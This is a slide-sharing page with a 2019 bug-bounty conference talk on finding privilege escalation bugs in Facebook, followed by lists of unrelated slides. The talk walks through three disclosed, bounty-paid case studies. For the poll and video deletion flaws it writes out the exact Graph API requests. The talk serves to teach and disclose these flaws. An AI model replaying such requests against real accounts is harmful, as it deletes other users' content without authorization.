How To Find High Impact Privilege Escalation Bugs - Pranav Hivarekar

•

0 likes•7 views

My talk at BountyCon by Facebook & Google at Facebook APAC HQ, Singapore - Mar 2019 -"How To Find High Impact Privilege Escalation Bugs"

Technology

How To Find High
Impact Privilege
Escalation Bugs
Pranav Hivarekar

About Me
• Pranav Hivarekar
• Active Bug Hunter
• Facebook (Top 10), Nest, Snapchat, etc.
• MS Degree in Cybersecurity (USA)
• Worked At NCCGroup, NYC, USA
• Founder @PeritusInfosec
• Trainings @PeritusInfosec
• Pentester @Cobalt.io
@HivarekarPranav

Agenda
• My First Bounty Story
• Simple Privilege Escalation Methodology
• Case Studies
• Conclusion
@HivarekarPranav

Facebook 2018 Stats
• 48 Bugs Reported
• 27 Valid Bugs
• 22 Bounties
@HivarekarPranav

Simple Privilege Escalation Testing Methodology
1. Find endpoints
2. What are roles?
3. Try Privilege Escalation
1. Access/Modify another user’s data
2. Escalate privileges from lower to higher role
@HivarekarPranav

Case Study 1
Page Analyst Can Create/Edit/Modify
Frames Owned By Page
@HivarekarPranav

Background Information
• Facebook Pages
• Frames Studio
@HivarekarPranav

What Are Roles?
Source : https://www.facebook.com/help/289207354498410
@HivarekarPranav

Proof Of Concept
1. Create a page and add an Admin and Analyst.
2. Via Analyst's account visit:
https://www.facebook.com/fbcameraeffects/ma
nage/
3. Now, analyst can create `frames` for the `Page`
as well as edit/delete/modify frames created by
other admins.
@HivarekarPranav

Case Study 2
Deleting Live Polls From Any Live Video
@HivarekarPranav

Background Information
• Facebook Pages/ User Profiles
• Polls on videos
• GraphAPI – https://graph.facebook.com
@HivarekarPranav

Proof Of Concept
Get `poll_id` from any video
@HivarekarPranav

Proof Of Concept
Fire following request:
https://graph.facebook.com/<poll_id>?action=DEL
ETE_POLL&fields&access_token=<internal_app_ac
cess_token>&method=POST
This will delete the poll permanently.
@HivarekarPranav

Proof Of Concept
Poll got deleted!
@HivarekarPranav

Case Study 3
Delete Any Video From Facebook
@HivarekarPranav

Background Information
• Facebook Pages/User Profiles
• Video Comments
• GraphAPI – https://graph.facebook.com
@HivarekarPranav

Proof Of Concept
1] Create a comment on a page post via API
API call : Reference
(https://developers.facebook.com/docs/graph-
api/reference/object/comments/)
POST /<post id>/comments?message=test
@HivarekarPranav

Proof Of Concept
2] Edit the comment and attach a VIDEO of your choice via API
eg. We will delete videos from (https://www.facebook.com/Testyeah-
1580326912211117/?fref=ts)
Victim's video id : 1739331926310614
API call : (https://developers.facebook.com/docs/graph-
api/reference/v2.6/comment)
POST /<comment id>?attachment_id= 1739331926310614
@HivarekarPranav

Proof Of Concept
3] Delete the comment
API call :
(https://developers.facebook.com/docs/graph-
api/reference/v2.6/comment)
DELETE /<comment id>
@HivarekarPranav

Conclusion
To Be Successful At Bug Bounties Rely On
METHODOLOGIES!
@HivarekarPranav

@HivarekarPranav
To learn more about Pranav Hivarekar, please check:
Personal Blog : https://pranavhivarekar.in/
Facebook. : http://www.facebook.com/pranavhivarekar
Twitter : https://twitter.com/HivarekarPranav
Linkedin : https://linkedin.com/in/pranavhivarekar

Similar to How To Find High Impact Privilege Escalation Bugs - Pranav Hivarekar

PEC Social Media Crash Course

Sarah Page

Harness the Power of Webinars with Social — Justin Levy (Social Fresh WEST 2012)

Social Fresh Conference

How To Harness The Power Of Webinars

Justin Levy

Slides from a presentation at the University of Portsmouth Business School on `6 March 2016. Download 3 great Facebook resources free of charge: - The Facebook Ads Toolkit - 66 pages retails at £29 - Study: Boosted vs Promoted Posts - which is best? (The only study of it's kind in the world) - Case study: Social media and technology use by UK wellbeing services https://thedigiterati.com/free-facebook-resources/

Advanced Facebook Marketing: The latest changes, best practice tips, tricks a...

The Digiterati

Social Media Means Business

Jay Berkowitz www.TenGoldenRules.com

Leveraging Rails to Build Facebook Apps

David Keener

Power Apps community call-June 2020

Microsoft 365 Developer

Inside Story: Scratching the Black Box - API

Ravisuriya .

OnlineTyari is India's leading web and mobile app platform for online preparation of different competitive exams. OnlineTyari has more than 10Million App Downloads so far. The main objective was to drive Indian community towards online education for competitive exams and build OnlineTyari as a vibrant brand with a buzzing online community. Objective also includes increase website traffic & app installs from Social Media channels.

OnlineTyari Case Study

SocialChamps

Every social media platform has its own language, characteristics and idiosyncrasies and it is necessary to have a basic understanding of the tools before you jump in. From Facebook, Twitter, LinkedIn, Google+, Pinterest, Instagram, YouTube, and more, learn the mechanics of each platform, how to decide what platforms are worthwhile for a business, and how to maximize your time while using them. You leave with a deeper understanding of what each social platform offers and whether it would be beneficial for you to spend time swimming in that community. Karen Weikert and Gwen Woltz are the co-founders of Wahine Media, a local social media agency. As social media practitioners, they spend their days posting on behalf of clients and training businesses on the best practices of social media. Karen has over 14 years experience in digital media: designing and managing large complex websites and building online communities for both corporations and non-profit clients. Gwen has over 5 years of digital media experience and is the current president of Social Media Club Hawaii. Both Gwen and Karen received Technology News Bytes' Social Media Award in 2012, and were deemed one of Honolulu's top social media influencers. Together, they provide social media services for businesses from universities to tech startups, from health spas to hotel chains, and from health care to HR and staffing companies.

Overview of Social Platforms | Pacific New Media Course Taught By Wahine Media

Wahine Media

The CUTGroup at Open Gov Hack Night

Smart Chicago Collaborative

Strategic communication professionals are early adopters in using social media to distribute information, but often do not take advantage of the flood of audience data that accumulates online. Social media users leave digital footprints that show their activities, interests, ideas, connections, and concerns. The information shared on social media sites is a goldmine for public relations practitioners

How To Avoid Drowning in the Digital Data Stream: Techniques and Tools for Ef...

meghan_caprez

Drowning In Data? Analytics Tools for Public Relations Pros

Kathleen Stansberry

Get more Social Fresh training at http://socialfresh.com/training Find out more about Social Fresh Conferences at http://socialfreshconference.com THE SOCIAL MARKETER'S 2014 TOOLKIT (over 100 software and tool recommendations) Learn what tools top social marketers use for monitoring, publishing, content, automation and lead gen. We're Going To Show You... Tips for content marketing research, finding better stories, trends and content. Software for editorial calendars and content organization. Tools for publishing, scheduling, analytics, polls, surveys, content creation and automation. Apps for taking better photos, editing images, and publishing. Co-presenters: Sarah Evans http://twitter.com/PRsarahevans Jason Keath http://twitter.com/JasonKeath Moderator: Jason Yarborough http://twitter.com/yarby

The Social Marketer's 2014 Toolkit Webinar

Social Fresh Conference

Working With Facebook, Twitter, et al. - Social Media Camp

Mike Anderson

This Social Media Overview class will give you a bird’s eye view of a wide array of social media sites and tools. Get the latest in social media best practices. You will learn how others are making use of them and how they might make sense for you. At the end of this class you will have a clear understanding of the social media landscape as well as enough knowledge to make an educated decision on which social media channels are right for you and your firm. This is a very engaging and interactive class.

iCPA: A Social Media Overview For The CPA

Mitch Miles

Pinteresting

Ammy Sriyunyongwat

iOS engineer and founder of Filma App (recently voted product of the day on Product Hunt), Miguel Lorenzo, walks us through app development and ASO (app store optimisation). You'll learn how to approach early release (beta version with limited features), including how to track preferences in Google Analytics, get user feedback and find what your users really want. In this presentation, we'll cover: • Idea and app development • Product launch • ASO (app store optimisation) • App promotion • App landing page • Product Hunt launch You'll get loads of tips and learn how to promote your app with promotional videos for new releases for social networks. You'll also learn how to reach out to influencers and tech blogs to help promote your product.

Number 1 on Product Hunt: How I Got Early Growth for My Mobile App

In Marketing We Trust

CUTGroup Presentation for Social Enterprise Class at Northwestern University

Smart Chicago Collaborative

CCPRO | Stepping Up Your Social Media Game | I Can Afford College

Toby Phillips

Similar to How To Find High Impact Privilege Escalation Bugs - Pranav Hivarekar (20)

PEC Social Media Crash Course

Harness the Power of Webinars with Social — Justin Levy (Social Fresh WEST 2012)

How To Harness The Power Of Webinars

Advanced Facebook Marketing: The latest changes, best practice tips, tricks a...

Social Media Means Business

Leveraging Rails to Build Facebook Apps

Power Apps community call-June 2020

Inside Story: Scratching the Black Box - API

OnlineTyari Case Study

Overview of Social Platforms | Pacific New Media Course Taught By Wahine Media

The CUTGroup at Open Gov Hack Night

How To Avoid Drowning in the Digital Data Stream: Techniques and Tools for Ef...

Drowning In Data? Analytics Tools for Public Relations Pros

The Social Marketer's 2014 Toolkit Webinar

Working With Facebook, Twitter, et al. - Social Media Camp

iCPA: A Social Media Overview For The CPA

Pinteresting

Number 1 on Product Hunt: How I Got Early Growth for My Mobile App

CUTGroup Presentation for Social Enterprise Class at Northwestern University

CCPRO | Stepping Up Your Social Media Game | I Can Afford College

Recently uploaded

The presentation underscores the strategic advantage of treating design systems not just as technical assets but as vital business components that require thoughtful management, robust planning, and strategic alignment with organizational goals. Key Points Covered: - Understanding Design Systems as Business Entities: Conceptualizing design systems as internal business entities can streamline their integration and evolution within a company. - Adoption and Expansion: Elaborating on the importance of tactical adoption across organizational structures, enhancing product suites to cater to user needs and broadening scope to mobile and content authoring solutions. - Data-Driven Development: Utilizing data insights for component development ensures that resources are allocated to create valuable, widely used features. - Financial Modeling for Design Systems: Developing sustainable funding models is crucial for long-term support and success of design systems. - Promoting Internal Buy-In: Stressing on strategies for promoting design systems within the organization to increase engagement and investment from internal stakeholders.

A Business-Centric Approach to Design System Strategy

UXDXConf

Heather Hedden, Senior Consultant at Enterprise Knowledge, presented “Enterprise Knowledge Graphs: The Importance of Semantics” on May 9, 2024, at the annual Data Summit in Boston. In her presentation, Hedden describes the components of an enterprise knowledge graph and provides further insight into the semantic layer – or knowledge model – component, which includes an ontology and controlled vocabularies, such as taxonomies, for controlled metadata. While data experts tend to focus on the graph database components (RDF triple store or a label property graph), Hedden emphasizes they should not overlook the importance of the semantic layer.

Enterprise Knowledge Graphs - Data Summit 2024

Enterprise Knowledge

The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf

FIDO Alliance

In today’s fast-paced digital world, harnessing the power of artificial intelligence (AI) can significantly enhance productivity and creativity across various domains. With the advent of advanced language models like ChatGPT, developers, marketers, data analysts, and professionals in numerous other fields can now leverage AI-generated prompts to spark innovative ideas and streamline their workflows.

1111 ChatGPT Prompts PDF Free Download - Prompts for ChatGPT

iSEO AI

Webinar Recording: https://www.panagenda.com/webinars/easier-faster-and-more-powerful-notes-document-properties-reimagined/ Have you ever felt frustrated by the small properties dialog in Notes? Had to create an agent or button to quickly change a field? Searched endlessly for the field you wanted to compare each time you selected a new document? Wished you could just make the damned thing bigger? Luckily, there is a solution – and you probably already have it installed! With the free panagenda Document Properties (Pro) you get the properties dialog you always needed. Big, resizable, full-text searchable. View multiple documents at once or compare them with a diff viewer. Modify any field, and finally have an easy way to handle profile documents for all users. Join HCL Lifetime Ambassador Julian Robichaux to discover how Document Properties can simplify your work and assist you daily when using Domino applications – in the client or the designer. You will never look back! Key takeaways from this session - What Document Properties is, which editions there are, and how you can find it in Notes and Domino Designer - How you can search for and edit any field, compare documents, or CSV export all data - How to find, edit, and even delete profile documents - Which configuration settings are available to customize feature

Easier, Faster, and More Powerful – Notes Document Properties Reimagined

panagenda

Oauth 2.0 Introduction and Flows with MuleSoft

shyamraj55

Using IESVE for Room Loads Analysis - UK & Ireland

IES VE

New customer? New industry? New cloud? New team? A lot to handle! How to ensure the success of the project? Start it well! I've created the 3 areas of focus at the beginning of the project that helped me in multiple roles (BA, PO, and Consultant). Learn from real-world experiences and discover how these insights can empower you to deliver unparalleled value to your customers right from the project's start.

Powerful Start- the Key to Project Success, Barbara Laskowska

CzechDreamin

Working together SRE & Platform Engineering

Marcus Vechiato

TEST BANK For, Information Technology Project Management 9th Edition Kathy Sc...

marcuskenyatta275

Simplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdf

FIDO Alliance

IESVE for Early Stage Design and Planning

IES VE

Delivered by Michael Down at Gartner Data & Analytics Summit London 2024 - Your enemies use GenAI too: Staying ahead of fraud with Neo4j. Fraudsters exploit the latest technologies like generative AI to stay undetected. Static applications can’t adapt quickly enough. Learn why you should build flexible fraud detection apps on Neo4j’s native graph database combined with advanced data science algorithms. Uncover complex fraud patterns in real-time and shut down schemes before they cause damage.

Your enemies use GenAI too - staying ahead of fraud with Neo4j

Neo4j

Extensible Python: Robustness through Addition - PyCon 2024

Patrick Viafore

AI mind or machine power point presentation

yogeshlabana357357

How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf

FIDO Alliance

Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots

Leah Henrickson

Webinar Recording: https://www.panagenda.com/webinars/alles-neu-macht-der-mai-wir-durchleuchten-den-verbesserten-notes-eigenschaftendialog/ Haben Sie sich schon einmal über den zu kleinen Eigenschaftendialog in Notes geärgert? Mussten Sie einen Agenten oder eine Aktion erstellen, um schnell mal ein Feld zu ändern? Haben Sie jedes mal endlos nach dem zu vergleichenden Feld gesucht, nachdem Sie ein neues Dokument ausgewählt haben? Wollten Sie das verdammte Ding einfach nur größer machen? Zum Glück gibt es dafür eine Lösung – und sie ist wahrscheinlich bereits installiert! Mit dem kostenlosen panagenda Document Properties (Pro) erhalten Sie den Eigenschaftendialog, den Sie schon immer haben wollten. Größer, anpassbar, und im Volltext durchsuchbar. Sehen Sie mehrere Dokumente gleichzeitig oder vergleichen Sie mit einem Diff-Viewer. Ändern Sie beliebige Felder und haben Sie endlich eine einfache Möglichkeit, Profildokumente für alle Benutzer zu verwalten. Entdecken Sie mit HCL Ambassador Marc Thomas, wie Document Properties Ihre Arbeit vereinfachen und Sie bei der täglichen Verwendung von Domino-Anwendungen unterstützen kann – im Client oder im Designer. Sie werden es nicht bereuen! Für Sie in diesem Webinar - Was Document Properties ist, welche Editionen es gibt und wo es in Notes und Domino Designer zu finden ist - Wie Sie nach einem beliebigen Feld suchen und es bearbeiten, Dokumente vergleichen oder alle Daten per CSV exportieren können - Suchen, Bearbeiten und auch Löschen von Profildokumenten - Welche Konfigurationseinstellungen verfügbar sind, um Funktionen anzupassen - Wie Ihre Endbenutzer davon profitieren - Sehen Sie alles in einer Live-Demo

Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...

panagenda

ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...

FIDO Alliance

This our Twelfth semiannual report on the global Cryptocurrency mining industry. Bitcoin is the world’s largest special purpose supercomputer. And it is globally decentralized. Millions of nodes all run the same open-source code to secure the Bitcoin network, create value, and put new transactions onto the distributed ledger. The latest Top500 list has just been announced at the ISC 2024 conference in Hamburg, and once again the Frontier supercomputer with 1.2 Exaflops peak performance is number one on the list. If assigned to SHA-256 hashing, Frontier would provide only the equivalent hash rate of about three cabinets of the latest high-end Bitcoin mining systems, costing less than 0.1% of Frontier’s cost. Michael Saylor, Chairman of MicroStrategy, has pointed out that GPUs are two orders of magnitude slower than the 5-nanometer technology of custom ASICs used for Bitcoin mining today. He makes the point that the Bitcoin network is unassailable by all of the hyperscale computing resources combined in AWS, Google, and Microsoft Azure cloud data centers today.

TopCryptoSupers 12thReport OrionX May2024

Stephen Perrenod

Recently uploaded (20)

A Business-Centric Approach to Design System Strategy

Enterprise Knowledge Graphs - Data Summit 2024

The Value of Certifying Products for FDO _ Paul at FIDO Alliance.pdf

1111 ChatGPT Prompts PDF Free Download - Prompts for ChatGPT

Easier, Faster, and More Powerful – Notes Document Properties Reimagined

Oauth 2.0 Introduction and Flows with MuleSoft

Using IESVE for Room Loads Analysis - UK & Ireland

Powerful Start- the Key to Project Success, Barbara Laskowska

Working together SRE & Platform Engineering

TEST BANK For, Information Technology Project Management 9th Edition Kathy Sc...

Simplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdf

IESVE for Early Stage Design and Planning

Your enemies use GenAI too - staying ahead of fraud with Neo4j

Extensible Python: Robustness through Addition - PyCon 2024

AI mind or machine power point presentation

How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf

Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots

Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...

ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...

TopCryptoSupers 12thReport OrionX May2024

How To Find High Impact Privilege Escalation Bugs - Pranav Hivarekar

1. 30 March 2019 • Facebook HQ

2. How To Find High Impact Privilege Escalation Bugs Pranav Hivarekar

3. About Me • Pranav Hivarekar • Active Bug Hunter • Facebook (Top 10), Nest, Snapchat, etc. • MS Degree in Cybersecurity (USA) • Worked At NCCGroup, NYC, USA • Founder @PeritusInfosec • Trainings @PeritusInfosec • Pentester @Cobalt.io @HivarekarPranav

4. Agenda • My First Bounty Story • Simple Privilege Escalation Methodology • Case Studies • Conclusion @HivarekarPranav

5. Facebook 2018 Stats • 48 Bugs Reported • 27 Valid Bugs • 22 Bounties @HivarekarPranav

6. Simple Privilege Escalation Testing Methodology 1. Find endpoints 2. What are roles? 3. Try Privilege Escalation 1. Access/Modify another user’s data 2. Escalate privileges from lower to higher role @HivarekarPranav

7. Case Study 1 Page Analyst Can Create/Edit/Modify Frames Owned By Page @HivarekarPranav

8. Background Information • Facebook Pages • Frames Studio @HivarekarPranav

9. Frames @HivarekarPranav

10. What Are Roles? Source : https://www.facebook.com/help/289207354498410 @HivarekarPranav

11. Proof Of Concept 1. Create a page and add an Admin and Analyst. 2. Via Analyst's account visit: https://www.facebook.com/fbcameraeffects/ma nage/ 3. Now, analyst can create `frames` for the `Page` as well as edit/delete/modify frames created by other admins. @HivarekarPranav

12. Bounty – 500$ @HivarekarPranav

13. Case Study 2 Deleting Live Polls From Any Live Video @HivarekarPranav

14. Background Information • Facebook Pages/ User Profiles • Polls on videos • GraphAPI – https://graph.facebook.com @HivarekarPranav

15. Live Polls @HivarekarPranav

16. Proof Of Concept Get `poll_id` from any video @HivarekarPranav

17. Proof Of Concept Fire following request: https://graph.facebook.com/<poll_id>?action=DEL ETE_POLL&fields&access_token=<internal_app_ac cess_token>&method=POST This will delete the poll permanently. @HivarekarPranav

18. Proof Of Concept Poll got deleted! @HivarekarPranav

19. Bounty – 1500$ @HivarekarPranav

20. Case Study 3 Delete Any Video From Facebook @HivarekarPranav

21. Background Information • Facebook Pages/User Profiles • Video Comments • GraphAPI – https://graph.facebook.com @HivarekarPranav

22. Video Comments @HivarekarPranav

23. Proof Of Concept 1] Create a comment on a page post via API API call : Reference (https://developers.facebook.com/docs/graphapi/reference/object/comments/) POST /<post id>/comments?message=test @HivarekarPranav

24. Proof Of Concept 2] Edit the comment and attach a VIDEO of your choice via API eg. We will delete videos from (https://www.facebook.com/Testyeah- 1580326912211117/?fref=ts) Victim's video id : 1739331926310614 API call : (https://developers.facebook.com/docs/graphapi/reference/v2.6/comment) POST /<comment id>?attachment_id= 1739331926310614 @HivarekarPranav

25. Proof Of Concept 3] Delete the comment API call : (https://developers.facebook.com/docs/graphapi/reference/v2.6/comment) DELETE /<comment id> @HivarekarPranav

26. Bounty – 15000$ @HivarekarPranav

27. Conclusion To Be Successful At Bug Bounties Rely On METHODOLOGIES! @HivarekarPranav

28. @HivarekarPranav To learn more about Pranav Hivarekar, please check: Personal Blog : https://pranavhivarekar.in/ Facebook. : http://www.facebook.com/pranavhivarekar Twitter : https://twitter.com/HivarekarPranav Linkedin : https://linkedin.com/in/pranavhivarekar

How To Find High Impact Privilege Escalation Bugs - Pranav Hivarekar

Recommended

Recommended

More Related Content

Similar to How To Find High Impact Privilege Escalation Bugs - Pranav Hivarekar

Similar to How To Find High Impact Privilege Escalation Bugs - Pranav Hivarekar (20)

Recently uploaded

Recently uploaded (20)

How To Find High Impact Privilege Escalation Bugs - Pranav Hivarekar